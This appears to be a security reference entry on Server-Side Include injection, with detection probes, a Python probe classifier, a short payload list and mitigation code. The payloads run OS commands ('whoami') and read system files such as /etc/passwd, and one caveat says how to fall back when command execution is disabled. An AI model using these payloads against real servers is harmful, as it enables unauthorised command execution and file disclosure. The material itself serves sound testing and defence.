High Severity | OWASP A03:2021
🟠 Server-Side Include (SSI) Injection
🧠 Description
SSI Injection occurs when untrusted input is written into a page that the web server parses for Server-Side Include directives (for example Apache mod_include on `.shtml` files) without output encoding. Because the server evaluates the directives before the page is sent, an attacker who can get `<!--#exec -->` or `<!--#include -->` into such a page can run OS commands or read files with the web server's privileges.
Impact: RCE, File Access, Information Disclosure
🔍 Detection
- Test (benign, confirms that input is parsed as SSI): `<!--#echo var="DATE_LOCAL" -->` - a timestamp appearing in the response where the directive was injected means the server evaluated it.
- Test (file read): `<!--#include virtual="/etc/passwd" -->`
- Test (command execution): `<!--#exec cmd="whoami" -->`
- Check the raw response body, not the rendered page: an unparsed directive is an HTML comment and is invisible in the browser. If it comes back HTML-encoded (`&lt;!--#echo ...`), output encoding is in place and the sink is not injectable.
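The following probe classifier is an added example, not part of the original page: it takes the `#echo DATE_LOCAL` test above and decides from a response body whether the directive was evaluated, reflected verbatim, HTML-encoded, or not reflected at all. It also adds a `#set`/`#echo` canary probe, which assumes the target runs Apache mod_include (those directives are mod_include's); the canary is more reliable than a date regex because you look for a string you chose. The sample responses are constructed to stand in for three hypothetical builds of the same page; the `requests` wrapper is left to the caller.

```python
import html
import re

# Probe taken from the page: a benign directive whose output is a timestamp
# (Apache's default timefmt is "%A, %d-%b-%Y %H:%M:%S %Z").
DATE_PROBE = '<!--#echo var="DATE_LOCAL" -->'
DATE_EVIDENCE = re.compile(
    r"(Mon|Tues|Wednes|Thurs|Fri|Satur|Sun)day, \d{2}-[A-Z][a-z]{2}-\d{4} \d{2}:\d{2}:\d{2}"
)

# Added canary probe (assumption: target runs Apache mod_include, whose #set/#echo
# directives let us search for a string we chose rather than for a date format).
CANARY = "ssi-canary-7f3a"
CANARY_PROBE = f'<!--#set var="c" value="{CANARY}" --><!--#echo var="c" -->'


def classify_response(probe: str, body: str, evidence) -> str:
    """Classify what the server did with an injected SSI probe.

    reflected : directive came back verbatim -> input reflected, not parsed as SSI
                (it is an HTML comment, so only visible in the raw response)
    encoded   : directive came back HTML-escaped -> output encoding is in place
    evaluated : directive gone and its output present -> SSI injection confirmed
    absent    : nothing found -> input not reflected at this sink (or filtered)
    """
    if probe in body:
        return "reflected"
    if html.escape(probe) in body or html.escape(probe, quote=False) in body:
        return "encoded"
    if isinstance(evidence, str):
        found = evidence in body
    else:
        found = evidence.search(body) is not None
    return "evaluated" if found else "absent"


def run_probes(body_for_probe) -> dict:
    """body_for_probe: callable(probe) -> response body, e.g. a wrapper around
    requests.get that puts the probe into the suspected sink. Returns {probe: verdict}."""
    return {
        "echo DATE_LOCAL": classify_response(DATE_PROBE, body_for_probe(DATE_PROBE), DATE_EVIDENCE),
        "set/echo canary": classify_response(CANARY_PROBE, body_for_probe(CANARY_PROBE), CANARY),
    }


# Constructed sample responses (no live target): the same comment page as served by
# three hypothetical builds, keyed by the probe that was submitted.
SAMPLE_RESPONSES = {
    "vulnerable": {
        DATE_PROBE: "<p>Your comment: Tuesday, 12-Mar-2024 10:15:02 UTC</p>",
        CANARY_PROBE: f"<p>Your comment: {CANARY}</p>",
    },
    "not parsed": {
        DATE_PROBE: f"<p>Your comment: {DATE_PROBE}</p>",
        CANARY_PROBE: f"<p>Your comment: {CANARY_PROBE}</p>",
    },
    "escaped": {
        DATE_PROBE: f"<p>Your comment: {html.escape(DATE_PROBE)}</p>",
        CANARY_PROBE: f"<p>Your comment: {html.escape(CANARY_PROBE)}</p>",
    },
}


def verdicts_for(build: str) -> dict:
    """Run both probes against one of the constructed builds."""
    return run_probes(lambda probe: SAMPLE_RESPONSES[build][probe])


if __name__ == "__main__":
    for build in SAMPLE_RESPONSES:
        print(build, verdicts_for(build))
```

Only an `evaluated` verdict justifies moving on to the `#include` and `#exec` payloads; `reflected` means the same input is a candidate for XSS rather than SSI, and `encoded` means the sink is already handled.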
💣 Payloads
<!--#exec cmd="whoami" -->
<!--#include virtual="/etc/passwd" -->
<!--#echo var="DATE_LOCAL" -->
<!--#fsize file="config.php" -->
Caveats for Apache mod_include: `virtual=` is a URL path resolved by an internal subrequest, so `/etc/passwd` is only returned if that URL is actually served; `file=` is relative to the directory of the current document and rejects absolute paths and `../`. `#exec cmd` is unavailable when the server runs with `Options IncludesNOEXEC`, in which case fall back to `#include`, `#echo` and `#fsize` for file disclosure.
🛡️ Mitigation
✅ Disable SSI in the web server wherever it is not needed (Apache: `Options -Includes`, and drop the `INCLUDES` output filter / `XBitHack`). If SSI must stay on, `Options IncludesNOEXEC` removes `#exec` so injection can no longer run commands.
✅ HTML-encode all untrusted input before it is written into any page the server parses for SSI (`.shtml` or any file with the includes filter); never store raw user input in such files.
✅ Use an allowlist for `#include` targets: map a user-chosen key to a fixed path, and never pass user input into `file=` or `virtual=`.
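An added example of the two application-side controls above, written for this page and not taken from any project: the vulnerable template writes user text straight into a page the server will parse, the safe one HTML-encodes it so the literal `<!--#` token never reaches mod_include, and `#include` targets are chosen from an allowlist by key instead of by path. The template strings, allowlist entries and `config.php`-style inputs are hypothetical.

```python
import html
import re

# Every SSI directive begins with "<!--#"; the regex also tolerates whitespace so the
# rejection check stays conservative.
SSI_DIRECTIVE = re.compile(r"<!--\s*#")


def render_comment_vulnerable(user_text: str) -> str:
    """Illustration of the bug: untrusted text concatenated into a page that the
    server parses for SSI (e.g. a .shtml guestbook). Hypothetical template."""
    return f'<p class="comment">{user_text}</p>'


def render_comment_safe(user_text: str) -> str:
    """Same template with output encoding: "<" becomes "&lt;" and quotes become
    "&quot;", so mod_include never sees "<!--#" and the browser shows the text as-is."""
    return f'<p class="comment">{html.escape(user_text)}</p>'


def contains_ssi_directive(user_text: str) -> bool:
    """Defence in depth: refuse input that carries a directive outright.
    Output encoding remains the primary control; this only adds a second layer."""
    return SSI_DIRECTIVE.search(user_text) is not None


# Allowlist for includes: user input selects a logical key, never a path.
INCLUDE_ALLOWLIST = {
    "header": "/includes/header.html",
    "footer": "/includes/footer.html",
}


def resolve_include(name: str):
    """Map a user-chosen key to a fixed virtual path; anything else yields None."""
    return INCLUDE_ALLOWLIST.get(name)


def include_directive(name: str) -> str:
    """Build the #include directive for an allowlisted key, refusing everything else."""
    path = resolve_include(name)
    if path is None:
        raise ValueError(f"include not allowed: {name!r}")
    return f'<!--#include virtual="{path}" -->'


if __name__ == "__main__":
    payload = '<!--#exec cmd="whoami" -->'
    print("vulnerable:", render_comment_vulnerable(payload))
    print("safe      :", render_comment_safe(payload))
    print("rejected  :", contains_ssi_directive(payload))
    print("include   :", include_directive("footer"))
```

The safe renderer is enough on its own because mod_include matches the literal `<!--#` sequence; the rejection check and the allowlist exist so that a single missed encoding call does not turn straight into command execution or arbitrary file inclusion.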